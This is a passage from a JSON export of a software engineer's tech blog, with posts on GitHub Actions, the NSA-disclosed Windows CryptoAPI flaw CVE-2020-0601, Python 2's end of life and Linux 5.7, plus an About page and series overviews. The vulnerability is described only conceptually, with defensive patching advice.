management. Adding CI/CD to that single point of failure is worth thinking about. The supply chain security implications of consolidated tooling are increasingly important as our infrastructure becomes more interconnected.\nThe Real Competition: GitLab CI # While Travis and CircleCI face the most immediate pressure, I think the more interesting competitive dynamic is between GitHub Actions and GitLab CI/CD.\nGitLab has had integrated CI/CD for years, and it\u0026rsquo;s genuinely excellent. Their pipeline syntax is mature, their runner infrastructure (including self-hosted runners) is battle-tested, and their Auto DevOps feature offers zero-config CI/CD for common project types.\nWhat GitHub Actions has is distribution. GitHub hosts the overwhelming majority of open-source projects and a massive share of private repositories. GitLab\u0026rsquo;s CI is arguably more mature, but GitHub\u0026rsquo;s reach means Actions will likely see faster ecosystem growth.\nFor teams already on GitLab, I see no compelling reason to switch. GitLab CI is more feature-complete today. But for the millions of projects on GitHub that were using third-party CI, the gravitational pull of an integrated solution is strong.\nWorkflow Patterns I\u0026rsquo;ve Found Useful # After migrating several repos, here are patterns that have worked well:\nReusable workflow fragments: Keep common steps in composite actions within your organization. We have a shared action for our standard Node.js build-test-lint sequence that every repo references.\nPath-filtered triggers: Use on.push.paths and on.pull_request.paths to avoid running expensive test suites when only documentation changes. This saves minutes and keeps feedback loops fast.\nConditional deployments: The if conditionals on jobs work well for deploy-on-tag patterns:\ndeploy: if: startsWith(github.ref, \u0026#39;refs/tags/v\u0026#39;) needs: [test, lint] Dependabot + auto-merge: GitHub\u0026rsquo;s Dependabot creates PRs for dependency updates, and you can write an Actions workflow that auto-merges them when CI passes and the update is a patch version. This has dramatically reduced my dependency maintenance overhead.\nMy Take # GitHub Actions is good enough today for most CI/CD workloads, and it\u0026rsquo;s going to get better fast. The marketplace ecosystem is its biggest advantage — it lowers the effort floor for CI/CD in a way that benefits everyone, especially smaller teams and open-source maintainers who don\u0026rsquo;t want to maintain complex pipeline configurations.\nThat said, I\u0026rsquo;d caution against migrating critical production deployment pipelines just yet. For build-and-test workflows on open source, it\u0026rsquo;s a no-brainer. For deploying to production, I\u0026rsquo;d want to see more maturity in areas like approval gates, environment management, and deployment tracking before going all-in.\nThe CI/CD landscape in 2020 is more competitive than it\u0026rsquo;s been in years, and that\u0026rsquo;s great for developers. Whether you\u0026rsquo;re on GitHub Actions, GitLab CI, CircleCI, or even good old Jenkins — the bar is being raised for everyone.\n","date":"16 January 2020","externalUrl":null,"permalink":"/posts/200116-github-actions-reshaping-ci-cd/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Actions went generally available in November 2019. Two months in, the migration patterns are becoming clear — and the implications for the CI/CD landscape are significant.","title":"GitHub Actions Is Quietly Reshaping CI/CD — Two Months After GA","type":"posts"},{"content":"This week, something unusual happened in the security world. The NSA — yes, that NSA — publicly disclosed a critical vulnerability in Windows 10\u0026rsquo;s cryptographic library. CVE-2020-0601 affects the way Windows validates Elliptic Curve Cryptography (ECC) certificates, and it\u0026rsquo;s about as serious as crypto bugs get. Microsoft pushed an emergency patch on Tuesday\u0026rsquo;s Patch Tuesday.\nBut the real story isn\u0026rsquo;t just the bug itself. It\u0026rsquo;s who found it and what they did with it. This disclosure stands in stark contrast to the historical revelations about the CIA-NSA\u0026rsquo;s relationships with encryption vendors and raises important questions about government transparency in cybersecurity.\nWhat CVE-2020-0601 Actually Does # The vulnerability lives in crypt32.dll, specifically in the code that validates ECC certificate chains. The flaw allows an attacker to craft a certificate that spoofs a trusted root certificate authority. In practical terms, this means:\nHTTPS interception: An attacker could create a fake certificate for any website that Windows would accept as legitimate. Your browser (Edge, Chrome on Windows, IE) would show the green padlock with no warnings. Code signing bypass: Malicious executables could be signed with forged certificates, making them appear to come from trusted software vendors. Signed email spoofing: S/MIME signed emails could be forged to appear from trusted senders. The technical root cause is that Windows didn\u0026rsquo;t properly validate the explicit curve parameters in ECC certificates. An attacker can specify their own generator point for a known curve, effectively creating a different private key that Windows will accept as valid for a trusted CA\u0026rsquo;s public key. It\u0026rsquo;s an elegant attack — no brute force, no side channels, just a logic flaw in parameter validation.\nFor anyone interested in the cryptographic details, the issue is essentially that Windows allows the explicit specification of curve parameters (including the generator point G) even for named curves like P-256. By choosing a custom G that maps your rogue private key to the target CA\u0026rsquo;s public key, you can forge any certificate in the chain.\nWhy NSA Disclosure Matters # Here\u0026rsquo;s where it gets interesting. The NSA has historically been associated with hoarding zero-day vulnerabilities, not reporting them. The EternalBlue exploit — the NSA-developed weapon that leaked and powered WannaCry — is still fresh in many people\u0026rsquo;s memories. That was only three years ago.\nThis time, the NSA chose to report the vulnerability to Microsoft through proper channels and coordinated the disclosure. Anne Neuberger, director of the NSA\u0026rsquo;s Cybersecurity Directorate (a relatively new division, established in 2019), has been publicly pushing for a more transparent approach to vulnerability disclosure.\nI think this is genuinely significant. Whether you trust the NSA\u0026rsquo;s motives or not, the practical outcome is positive: a critical vulnerability was found and patched before it could be exploited in the wild. That\u0026rsquo;s how the system is supposed to work.\nIt also suggests that the NSA\u0026rsquo;s internal calculus is shifting. The argument for hoarding vulnerabilities has always been offensive capability — if we know about it and others don\u0026rsquo;t, we can use it. But EternalBlue demonstrated the catastrophic downside: when hoarded vulnerabilities leak, the damage is indiscriminate and massive.\nPatch Urgency and Practical Impact # Microsoft has rated this as \u0026ldquo;Important\u0026rdquo; rather than \u0026ldquo;Critical\u0026rdquo; in their severity classification, which I think undersells the risk. The attack surface is enormous — this affects every Windows 10 and Windows Server 2016/2019 system. The fact that it undermines the entire certificate trust model on Windows makes it functionally critical for any enterprise environment.\nIf you\u0026rsquo;re an IT admin or security engineer, here\u0026rsquo;s what to do:\nPatch immediately: This is not one to wait for your regular patch cycle. KB4528760 for Windows 10 1909/1903. Monitor for exploitation: The NSA\u0026rsquo;s advisory includes detection guidance. Look for certificates with explicit curve parameters where you\u0026rsquo;d expect named curves. Review your certificate validation: If you have custom applications that do their own TLS certificate validation on Windows, verify they use the updated CryptoAPI. Test your detection: Proof-of-concept code will almost certainly appear soon. Security researcher Saleem Rashid already demonstrated a working exploit within hours of the patch release. The Bigger Picture for Crypto Libraries # This bug is a reminder of something I\u0026rsquo;ve seen throughout my career: cryptographic code is extraordinarily difficult to get right. The vulnerability isn\u0026rsquo;t a buffer overflow or a memory corruption — it\u0026rsquo;s a logic error in certificate validation. Those are much harder to find with fuzzing or automated tools. Years later, the industry would face even more serious supply chain attacks that combined cryptographic exploitation with broader infrastructure compromise.\nThe OpenSSL library has historically handled ECC parameter validation more strictly, which is partly why Linux systems aren\u0026rsquo;t affected. But that\u0026rsquo;s not cause for complacency. Every crypto library has its own dark corners. The fact that this bug existed in shipping Windows code for years without anyone (apparently) exploiting it is either lucky or concerning, depending on how much you trust that \u0026ldquo;no exploitation in the wild\u0026rdquo; claim.\nFor developers: if you\u0026rsquo;re implementing anything involving certificate validation, TLS, or cryptographic verification — please don\u0026rsquo;t roll your own. Use well-tested libraries, keep them updated, and when possible, use the strictest validation settings available.\nMy Take # I\u0026rsquo;m cautiously optimistic about what this disclosure represents. A major intelligence agency choosing transparency over exploitation is a net positive for the security ecosystem. I don\u0026rsquo;t think it means the NSA has stopped stockpiling zero-days entirely — but it suggests the Vulnerabilities Equities Process is actually working in at least some cases.\nThe vulnerability itself is a perfect example of why cryptographic security is never \u0026ldquo;done.\u0026rdquo; You can have a well-designed protocol, a trusted implementation, and years of production use — and still have a fundamental logic flaw hiding in the parameter validation code.\nPatch your Windows boxes. Today, not tomorrow.\n","date":"9 January 2020","externalUrl":null,"permalink":"/posts/200109-nsa-cve-2020-0601-windows-cryptoapi/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The NSA disclosed CVE-2020-0601, a critical vulnerability in Windows CryptoAPI’s certificate validation. The fact that they reported it instead of hoarding it marks a notable shift.","title":"The NSA Found a Critical Windows Crypto Bug — And That's Actually Good News","type":"posts"},{"content":"The calendar flipped to 2020, and with it, Python 2 quietly drew its last official breath. As of January 1st, Python 2 is no longer supported by the Python Software Foundation. No more security patches, no more bug fixes, nothing. After nearly 20 years of service and over a decade of coexistence with Python 3, the plug has finally been pulled.\nI\u0026rsquo;ve been writing Python since the late 2.x days, and I have to say — this moment feels both overdue and slightly melancholic.\nA Transition That Took Way Too Long # Let\u0026rsquo;s be honest about this: the Python 2 to 3 migration has been one of the longest and most painful language transitions in software history. Python 3.0 was released in December 2008. That means we\u0026rsquo;ve had eleven years of overlap. Eleven years where the community was effectively split, where library authors had to maintain compatibility with both versions, and where the print statement versus print() function became a tribal marker.\nThe original end-of-life date was supposed to be 2015. It got extended to 2020 because the ecosystem simply wasn\u0026rsquo;t ready. Major libraries like NumPy, Django, and Requests took years to fully support Python 3, and many organizations had massive codebases that couldn\u0026rsquo;t be migrated overnight.\nThe Python Clock has been counting down for years, and now it\u0026rsquo;s at zero. But if you think everyone has migrated, I have some disappointing news.\nThe Real-World Impact # In my experience consulting with various teams, the reality is messier than the official timeline suggests. I know of production systems — important ones, handling real money and real data — that are still running Python 2.7. Some of these systems were written in 2010 and have been \u0026ldquo;stable\u0026rdquo; enough that nobody wanted to touch them.\nThe end-of-life doesn\u0026rsquo;t mean Python 2 stops working. Your scripts will still run on January 2nd exactly as they did on December 31st. What it means is:\nNo security patches: Any new vulnerabilities discovered in CPython 2.7 will not be fixed upstream. This is the big one. If you\u0026rsquo;re running internet-facing services on Python 2, you\u0026rsquo;re now accumulating unpatched security debt. Library abandonment: Major libraries have been dropping Python 2 support. NumPy stopped supporting Python 2 as of January 1st. pandas, matplotlib, and many others have announced similar timelines. No new features: Obviously. But more importantly, tooling like pip and setuptools will eventually stop working reliably with Python 2. Lessons From The Longest Goodbye # There are some real lessons here for the broader software engineering community. The Python 2/3 split was in many ways a case study in how not to handle a breaking language change.\nThe core mistake was underestimating how much breaking print, changing string handling (bytes vs. unicode), and altering integer division would impact real-world code. These weren\u0026rsquo;t obscure corner cases — they touched virtually every Python program ever written.\nWhat the Python community eventually got right was tooling. The 2to3 tool, six library, and the __future__ imports made gradual migration possible. Projects like python-modernize helped automate large chunks of the conversion. If you\u0026rsquo;re still facing a migration, these tools are mature and battle-tested at this point.\nThe other lesson is about organizational inertia. Technical migrations don\u0026rsquo;t happen because a deadline exists on a website. They happen when there\u0026rsquo;s business pressure — when a critical library drops support, when a security audit flags the risk, or when hiring becomes difficult because nobody wants to write Python 2 anymore.\nWhat To Do If You\u0026rsquo;re Still On Python 2 # If you\u0026rsquo;re reading this and your team still has Python 2 code in production, here\u0026rsquo;s my pragmatic advice:\nAudit your exposure: Identify which Python 2 services are internet-facing or handle sensitive data. These are your highest-priority migration targets. Pin your dependencies: Lock down your Python 2 environment completely. You don\u0026rsquo;t want a library update accidentally breaking things when you least expect it. Start with tests: If you don\u0026rsquo;t have good test coverage on your Python 2 code, add it before you migrate. The pytest framework works well with both versions and makes the transition smoother. Use python-modernize: It\u0026rsquo;s the most practical tool for converting Python 2 code to code that runs on both 2 and 3, which you can then clean up for Python 3 only. Budget for it: This isn\u0026rsquo;t a weekend project for a large codebase. I\u0026rsquo;ve seen migrations of substantial applications take 3-6 months with dedicated engineering effort. After the successful migration to Python 3, the language continued to evolve rapidly. Python 3.9 brought significant improvements, followed by structural pattern matching in Python 3.10 and substantial performance improvements with Python 3.11.\nMy Take # I\u0026rsquo;m glad Python 2 is finally done. The dual-version world was a drag on the entire ecosystem. Every library maintainer who had to keep if sys.version_info[0] \u0026gt;= 3 branches alive deserves a thank-you note.\nBut I also think there\u0026rsquo;s a cautionary tale here for every language community. Breaking changes are sometimes necessary, but the cost of a fragmented ecosystem is enormous. It\u0026rsquo;s something I think about when I see discussions about the next major version of various languages. Backward compatibility isn\u0026rsquo;t glamorous, but it\u0026rsquo;s the bedrock of developer trust.\nHere\u0026rsquo;s to a new decade with a single, unified Python. Now, about those f-strings — if you haven\u0026rsquo;t tried them yet, you\u0026rsquo;re missing out on one of the best small features Python 3 brought to the table. The subsequent evolution of the language shows how vibrant the Python ecosystem became once the 2/3 split was finally resolved.\n","date":"2 January 2020","externalUrl":null,"permalink":"/posts/200102-python2-end-of-life-new-decade/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 2 officially reached end-of-life on January 1, 2020. After over a decade of transition, what does this mean for teams still running Python 2 code?","title":"Python 2 Is Dead — Long Live Python 3","type":"posts"},{"content":"title: \u0026ldquo;Linux Kernel 5.7 — A Quiet Release with Lasting Impact\u0026rdquo; date: 2020-06-04 draft: false tags:\n\u0026ldquo;Open Source\u0026rdquo; \u0026ldquo;Development\u0026rdquo; \u0026ldquo;Linux\u0026rdquo; categories: \u0026ldquo;Open Source\u0026rdquo; series: \u0026ldquo;Open Source Chronicles\u0026rdquo; summary: \u0026ldquo;Linux 5.7 ships with split-lock detection, the new ExFAT driver, userfaultfd improvements, and a thermal management overhaul — a release that matters more than its headlines suggest.\u0026rdquo; description: \u0026ldquo;Linux 5.7 ships with split-lock detection, the new ExFAT driver, and significant thermal management improvements.\u0026rdquo; authors: [\u0026ldquo;Osmond van Hemert\u0026rdquo;] featured_image_alt: \u0026ldquo;Technology infrastructure and digital architecture with interconnected systems and data flows\u0026rdquo; Linux 5.7 was released by Linus Torvalds on May 31st, and as with many kernel releases, the changelog reads like infrastructure plumbing rather than flashy features. But this one has several changes that developers and sysadmins should pay attention to, particularly if you\u0026rsquo;re running virtualized workloads or dealing with storage performance.\nThe ExFAT Driver: A Microsoft Collaboration # Perhaps the most symbolically interesting addition is the new ExFAT file system driver, contributed by Samsung and developed with Microsoft\u0026rsquo;s blessing. Microsoft published the ExFAT specification last year and encouraged a proper in-kernel implementation. This collaboration exemplifies the broader Microsoft-loves-Linux narrative that has accelerated over the past few years. The previous ExFAT support in Linux was a staging driver with known issues and questionable legal standing.\nThe new driver is clean, performant, and properly licensed. For those of us who regularly shuttle data between Linux and Windows systems — or deal with SD cards and USB drives formatted as ExFAT — this is a genuine quality-of-life improvement. It\u0026rsquo;s also another data point in the ongoing Microsoft-loves-Linux narrative that would have been unthinkable a decade ago.\nI\u0026rsquo;ve tested the new driver with a few large file transfers and it\u0026rsquo;s noticeably more stable than the old staging driver. No more occasional corruption on unmount, which was a persistent annoyance.\nSplit-Lock Detection: Protecting Multi-Tenant Performance # The split-lock detection feature is one of those kernel changes that most developers will never interact with directly but that matters enormously for anyone running shared infrastructure. A split-lock occurs when an atomic operation spans a cache line boundary, forcing the CPU to lock the entire memory bus to maintain coherence. This is extremely expensive — a single split-lock can stall all cores for hundreds of cycles.\nIn a bare-metal single-tenant environment, this is mostly a self-inflicted performance wound. But in virtualized or multi-tenant environments — read: the cloud — one misbehaving VM can degrade performance for every other VM sharing the same physical host.\nKernel 5.7 adds the ability to detect split-lock operations and either warn about them or kill the offending process. For cloud providers, this is a meaningful tool for ensuring fair resource allocation. I expect we\u0026rsquo;ll see this enabled by default in cloud kernels fairly quickly.\nThe configuration options are sensible: split_lock_detect=fatal kills processes that trigger split-locks, while split_lock_detect=warn just logs them. For development environments, the warning mode is useful for catching performance issues before they hit production.\nUserfaultfd Write Protection: Better Live Migration # The userfaultfd subsystem — which allows user-space programs to handle page faults — got write-protection tracking support. This sounds obscure, but it\u0026rsquo;s a key enabler for two important use cases: database snapshotting and VM live migration.\nFor live migration specifically, write-protection tracking allows the hypervisor to efficiently identify which memory pages have been modified during migration. Instead of re-scanning all of memory, the kernel notifies user-space when a page is dirtied. This translates to faster migration times and shorter blackout periods when moving VMs between hosts.\nIf you\u0026rsquo;re running KVM-based virtualization, this is relevant. QEMU already has patches to take advantage of this feature, and I\u0026rsquo;d expect production hypervisors to adopt it over the next few kernel release cycles.\nThermal Management and ARM Progress # The kernel\u0026rsquo;s thermal management framework got a significant overhaul in 5.7, with the new power_allocator governor providing more intelligent thermal throttling. Instead of the crude step-down approach used previously, the new governor uses a PID controller to maintain target temperatures while maximizing performance. This matters for containerized workloads running on Kubernetes or Docker-based infrastructure where thermal efficiency directly impacts resource utilization.\nThis matters particularly for ARM-based systems, which are increasingly showing up in edge computing and server scenarios. The Raspberry Pi 4, various ARM development boards, and AWS Graviton2 instances all benefit from better thermal management.\nSpeaking of ARM, 5.7 continues the trend of improving ARM64 support with new SoC additions and driver improvements. The kernel\u0026rsquo;s ARM ecosystem has matured significantly — three years ago, running a mainline kernel on ARM hardware was an adventure. Today, it\u0026rsquo;s largely unremarkable, which is exactly where it should be.\nOther Noteworthy Changes # A few other additions worth mentioning:\nBPF improvements: The BPF subsystem continues to expand, with new helper functions and better BTF (BPF Type Format) support. BPF is quietly becoming one of the most important subsystems in the kernel for observability and networking. Habana Labs Gaudi AI accelerator support: Another AI training accelerator gets kernel support, reflecting the growing diversity of hardware in the ML training space. Zonefs file system: A new file system for zoned block devices (primarily SMR hard drives), co-developed by Western Digital. As storage media becomes more diverse, the kernel needs to support different access patterns. My Take # Linux 5.7 is a \u0026ldquo;boring\u0026rdquo; release in the best possible sense. No dramatic restructuring, no contentious API changes — just steady improvement of the infrastructure that runs most of the internet. The split-lock detection and userfaultfd improvements are exactly the kind of changes that make Linux better for cloud workloads without breaking anything for desktop or embedded users.\nI\u0026rsquo;ve been running Linux kernels in production since the 2.4 days, and what strikes me about the modern development process is how mature it\u0026rsquo;s become. The merge window is predictable, the release candidates are genuinely stable, and the range of hardware and use cases covered by each release is extraordinary.\nThe ExFAT driver is a nice cherry on top — not because the technology is particularly interesting, but because it represents the kind of cross-company collaboration that was rare in open source just a few years ago. Microsoft contributing patent rights so Linux can properly support their file system is a concrete act, not just a press release.\nIf you\u0026rsquo;re running production systems, I\u0026rsquo;d recommend updating to 5.7 after it lands in your distribution\u0026rsquo;s update channel. The split-lock detection alone is worth it for anyone running multi-tenant workloads. For the rest of us, it\u0026rsquo;s another solid release from a project that\u0026rsquo;s been consistently delivering for nearly 30 years.\n","externalUrl":null,"permalink":"/posts/200604-linux-kernel-57-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"","title":"","type":"posts"},{"content":" Hi, I\u0026rsquo;m Osmond # Senior software engineer, thirty years in. I started on Win32 and Borland Delphi, spent a decade in .NET when it was the answer to everything, and have been mostly in JavaScript and Node.js for the last ten years. None of these were good ideas at the time. All of them taught me something useful.\nWhat I Do # I write code, review code, and argue about code. The mix shifts depending on the team — some weeks it\u0026rsquo;s mostly architecture diagrams and trade-off documents, some weeks it\u0026rsquo;s pair-debugging a flaky deploy at 11pm. I prefer the second kind.\nI\u0026rsquo;m drawn to systems with too many moving parts: distributed services, build pipelines, anything that involves a queue and at least one timeout. I\u0026rsquo;m wary of abstractions that exist mostly to make a CV look richer, and I have strong opinions about logging, on-call rotations, and the right way to write a post-mortem.\nWhat I Write About # The blog is mostly notes-to-myself that turned out to be useful to other people. The recurring themes:\nAI \u0026amp; Machine Learning — the model releases, the framework wars, and the uncomfortable gap between demos and production. Security — supply-chain attacks, zero-days, and the boring controls that would have stopped half of them. Infrastructure — Kubernetes, DevOps, the platform engineering tax. Development — languages, runtimes, and tooling that\u0026rsquo;s worth the switching cost (most isn\u0026rsquo;t). Open Source — governance, funding, and the maintainers we keep losing. Connect # You can find me on:\nGitHub LinkedIn X / Twitter ","externalUrl":null,"permalink":"/about/","section":"Osmond van Hemert — Senior Software Engineer","summary":"","title":"About","type":"page"},{"content":" Overview # While machine learning engineers optimize algorithms, the real story of AI\u0026rsquo;s impact plays out in boardrooms, legislatures, and international treaties. This series covers the business and policy dimensions of AI—venture capital funding rounds, regulatory frameworks across regions, ethical debates over alignment and bias, and the geopolitical competition reshaping technology policy worldwide.\nUnderstanding this context is essential for anyone building AI systems—it shapes what you can deploy, who your customers are, and what constraints you\u0026rsquo;ll face.\nWhat You\u0026rsquo;ll Find Here # Investment \u0026amp; Market Dynamics: Major funding announcements, strategic partnerships, and how capital flows signal where AI development is accelerating.\nRegulatory Landscape: GDPR, AI Act, executive orders, and how different regions approach AI governance and safety requirements.\nEthical \u0026amp; Safety Debates: Alignment research, bias in AI systems, consent and data usage, and the philosophical questions about AI\u0026rsquo;s role in society.\nGeopolitical Dynamics: US-China competition, brain drain, chip export restrictions, and how AI has become a strategic technology.\nLabor \u0026amp; Society: Impact on employment, skills gaps, education adaptation, and how organizations are managing AI adoption at scale.\nLearning Path # Understand the investment landscape — who\u0026rsquo;s funding AI, at what valuations, and what that signals about market confidence Learn regulatory frameworks — what\u0026rsquo;s actually required in different regions and how to interpret guidelines Explore ethical considerations — what \u0026ldquo;responsible AI\u0026rdquo; means in practice and where the hardest problems are Track geopolitical shifts — how AI is reshaping global technology policy and competition Anticipate labor impacts — how AI adoption will likely reshape work and what that means for your organization Key Topics Covered # Funding \u0026amp; Valuations: Venture rounds, IPOs, acqui-hires, and strategic AI investments by big tech Policy \u0026amp; Regulation: EU AI Act, US executive orders, international governance, and compliance frameworks Safety \u0026amp; Ethics: Alignment, bias mitigation, explainability, and responsible AI principles Market Structure: Competitive dynamics, consolidation, and emerging business models around AI International Relations: Technology policy, export controls, talent competition, and strategic autonomy Related Series # Explore complementary areas: AI Models \u0026amp; Releases (the technical foundation of business decisions), Industry \u0026amp; Platforms (broader technology industry trends and strategies)\n","externalUrl":null,"permalink":"/series/ai-industry--regulation/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"AI Industry \u0026 Regulation","type":"series"},{"content":" Overview # The pace of AI model development has become breathtaking. This series tracks foundation models and their releases, from OpenAI\u0026rsquo;s GPT family and Anthropic\u0026rsquo;s Claude to open-source alternatives like Llama, Mistral, and Qwen. We analyze benchmarks, capabilities, pricing implications, and what each new release means for developers, researchers, and organizations building AI products.\nThe story goes beyond model architecture—it\u0026rsquo;s about capabilities, accessibility, costs, and the race to deploy state-of-the-art AI.\nWhat You\u0026rsquo;ll Find Here # Model Announcements: In-depth analysis of major model releases—new capabilities, performance improvements, context window expansions, and multimodal advances.\nBenchmark \u0026amp; Performance: Understanding model evaluation, comparing benchmarks across providers, and what performance metrics actually mean for your use case.\nOpen vs. Proprietary: The ecosystem shift toward open-weight models, fine-tuning capabilities, self-hosting trade-offs, and cost comparisons.\nPractical Integration: How to use these models via APIs, deploy locally, fine-tune for specific tasks, and navigate pricing and rate limits.\nIndustry Impact: How AI advances shape product strategy, influence hiring, and accelerate development workflows across industries.\nLearning Path # Grasp the foundation model landscape — understand proprietary models vs. open-weight alternatives Learn to evaluate models — benchmarks, actual performance on your domain, and capability comparisons Explore integration patterns — APIs vs. local deployment, fine-tuning, and cost optimization Track competitive dynamics — how releases shape the market and influence adoption Stay informed on breakthroughs — major capability jumps like multimodal or longer context windows Key Technologies \u0026amp; Models Covered # Model Families: GPT-4, Claude, Llama, Mistral, Qwen, Gemini, and emerging open-source models Capabilities: Text generation, code generation, vision/multimodal, reasoning, and instruction-following Infrastructure: vLLM, Ollama, Hugging Face inference, and self-hosting frameworks Integration: OpenAI API, Anthropic API, Groq, Together AI, and open-source alternatives Evaluation: MMLU, HumanEval, benchmarking methodologies, and custom evaluation frameworks Related Series # Explore complementary areas: Python Evolution (Python as the primary language for ML), Developer Tooling (AI-powered coding assistants and development tools), Open Source AI (open-weight models and community development)\n","externalUrl":null,"permalink":"/series/ai-models--releases/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"AI Models \u0026 Releases","type":"series"},{"content":" Overview # Security breaches and zero-day vulnerabilities reveal how systems fail under real attack. This series dissects significant security incidents, analyzing attack chains, exploited vulnerabilities, attacker motivations, and most importantly—what defenders can learn. Each incident tells a story about architecture decisions, detection blind spots, and what preventive measures actually work.\nThe goal isn\u0026rsquo;t alarmism—it\u0026rsquo;s understanding how to build systems that can withstand sophisticated attacks.\nWhat You\u0026rsquo;ll Find Here # Breach Autopsy: Deep analysis of high-impact breaches—from initial compromise through lateral movement to data exfiltration. Understanding attack chains helps you spot similar patterns.\nZero-Day Analysis: When vulnerabilities receive no warning—analyzing exploitation techniques, the researcher/attacker incentive structure, and how vendors respond.\nAttack Campaigns: Tracking persistent threat actors, their tools and techniques, and how their tactics evolve over time.\nDefensive Lessons: What each incident teaches us—configuration mistakes, detection gaps, and controls that actually prevented worse outcomes.\nIndustry Impact: How breaches reshape compliance requirements, vendor contracts, and organizational security practices.\nLearning Path # Learn attack fundamentals — understand common exploitation techniques and how attackers chain vulnerabilities Study real incidents — analyze actual breaches to spot patterns in how systems get compromised Trace defensive gaps — understand where and why standard controls failed in high-profile incidents Monitor emerging techniques — stay ahead of adversary tactics as they evolve Apply lessons to your architecture — understand how breach learnings apply to systems you build Key Areas Covered # Attack Techniques: Phishing, credential theft, privilege escalation, lateral movement, persistence, and exfiltration Vulnerable Components: Web applications, APIs, databases, authentication systems, and supply chain dependencies Detection \u0026amp; Response: How incidents were discovered, response effectiveness, and what slowed attackers down Infrastructure Decisions: Configuration errors, lack of segmentation, inadequate logging, and visibility gaps Attacker Motivation: Nation-state espionage, financially motivated attacks, hacktivism, and insider threats Related Series # Explore complementary areas: Cybersecurity Landscape (broader security trends and defenses), Supply Chain Security (dependency vulnerabilities and ecosystem attacks)\n","externalUrl":null,"permalink":"/series/breaches--zero-days/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Breaches \u0026 Zero-Days","type":"series"},{"content":" Overview # Technology industry dynamics shape what tools exist, which platforms thrive, and where investment flows. This series covers the business side of tech—platform strategies by giants (Google, Meta, Microsoft, Apple), market consolidation through acquisitions, emerging competition, and the strategic decisions reshaping the industry.\nUnderstanding industry trends helps product leaders, architects, and engineers anticipate shifts and make forward-looking technical decisions.\nWhat You\u0026rsquo;ll Find Here # Platform Strategies: How tech giants position competing platforms—from operating systems and cloud infrastructure to social networks and developer platforms.\nAcquisitions \u0026amp; Consolidation: Understanding major acquisitions, how they reshape competitive dynamics, and what integration strategies reveal about long-term vision.\nMarket Shifts: When new technologies emerge (generative AI, quantum computing) or incumbents falter, industry restructuring follows.\nDeveloper Ecosystem: How platforms invest in developer experiences, APIs, and ecosystems to enable third-party innovation.\nInternational Dynamics: Regulatory pressures from the EU and China, data sovereignty concerns, and how policy shapes market opportunities.\nVenture \u0026amp; Startup Trends: Where capital flows signals where the industry believes innovation is happening.\nLearning Path # Understand platform economics — network effects, lock-in, and what makes platforms defensible Track major acquisitions — understand why companies are acquired and what integration signals strategic direction Monitor competitive positioning — watch how leaders defend market share against emerging threats Anticipate market shifts — recognize signals of disruption before they\u0026rsquo;re obvious Evaluate emerging trends — distinguish hype from fundamental shifts that will reshape the industry Key Areas Covered # Tech Giants: Google, Amazon, Microsoft, Apple, Meta, and their platform strategies Market Segments: Cloud computing, developer tools, social media, search, and AI infrastructure Acquisitions: Strategic rationales, integration outcomes, and market implications Startups \u0026amp; Disruption: Venture funding trends and emerging companies challenging incumbents Regulation \u0026amp; Policy: Data privacy, antitrust, international competition, and how policy affects business models Developer Ecosystems: APIs, SDKs, communities, and platform investments in enabling third-party development Related Series # Explore complementary areas: Cloud Platform Watch (strategic moves by cloud providers), AI Industry \u0026amp; Regulation (how AI is reshaping industry dynamics)\n","externalUrl":null,"permalink":"/series/industry--platforms/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Industry \u0026 Platforms","type":"series"},{"content":" Overview # The JavaScript ecosystem is in constant motion. This series tracks the evolution of server-side JavaScript, focusing on the runtime wars between Node.js, Deno, and Bun, the rapid iteration of frameworks and tooling, and what these changes mean for developers building production systems.\nJavaScript\u0026rsquo;s dominance extends beyond browsers into backend infrastructure, DevOps, and systems programming. Understanding these trends helps developers make informed decisions about runtime selection, dependency management, and architectural patterns.\nWhat You\u0026rsquo;ll Find Here # Runtime Evolution: Track how Node.js, Deno, and Bun compete and converge—from workspace support to package manager wars to native module compatibility.\nFramework \u0026amp; Tooling: Deep-dives into modern development tools, testing frameworks, bundlers, and the developer experience layer that shields us from runtime complexity.\nPerformance \u0026amp; Architecture: Lessons on optimizing server-side JavaScript, understanding async/await patterns, and building scalable applications.\nEcosystem Decisions: Analysis of dependency vulnerabilities, package manager security, version management, and the practical considerations for production teams.\nLearning Path # Start with runtime comparisons — understand why Node.js dominates, what Deno and Bun bring to the table, and which runtime fits your use case Explore tooling evolution — see how bundlers, test runners, and linters are consolidating or specializing Dive into specific challenges — monorepo strategies, performance optimization, and security practices Follow industry shifts — watch how major platforms adopt new runtimes, how compatibility layers evolve, and when to migrate Key Technologies Covered # Runtimes: Node.js, Deno, Bun, and emerging alternatives Package Managers: npm, yarn, pnpm, and their security/performance tradeoffs Frameworks: Express, Fastify, Hono, and server-side rendering patterns Tooling: Vitest, Jest, esbuild, Turbopack, and developer productivity tools Databases \u0026amp; APIs: Integration patterns with backend services Related Series # Explore complementary areas: AI Models \u0026amp; Releases (AI-powered development tools), Developer Tooling (broader IDE and build system trends), Supply Chain Security (dependency and package manager security)\n","externalUrl":null,"permalink":"/series/javascript--node.js/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"JavaScript \u0026 Node.js","type":"series"},{"content":" Overview # Kubernetes has become the standard for container orchestration, but it\u0026rsquo;s also one of the most complex systems to operate. This series covers Kubernetes evolution, operational patterns that work in production, the mature ecosystem around containers, and how organizations at scale manage containerized infrastructure.\nWhether you\u0026rsquo;re adopting containers or optimizing existing deployments, understanding these patterns separates smooth operations from constant firefighting.\nWhat You\u0026rsquo;ll Find Here # Kubernetes Releases: Analyzing new Kubernetes versions, feature removals, and improvements—understanding what matters for your clusters.\nProduction Patterns: Real-world deployment patterns, multi-cluster strategies, network policies, and resource management in production systems.\nService Mesh Evolution: How service meshes (Istio, Linkerd) add observability and reliability, and when they\u0026rsquo;re worth the complexity.\nOperator Development: Building Kubernetes operators to automate complex application lifecycle management and stateful workload orchestration.\nContainer Ecosystem: Docker alternatives, image registries, vulnerability scanning, and supply chain 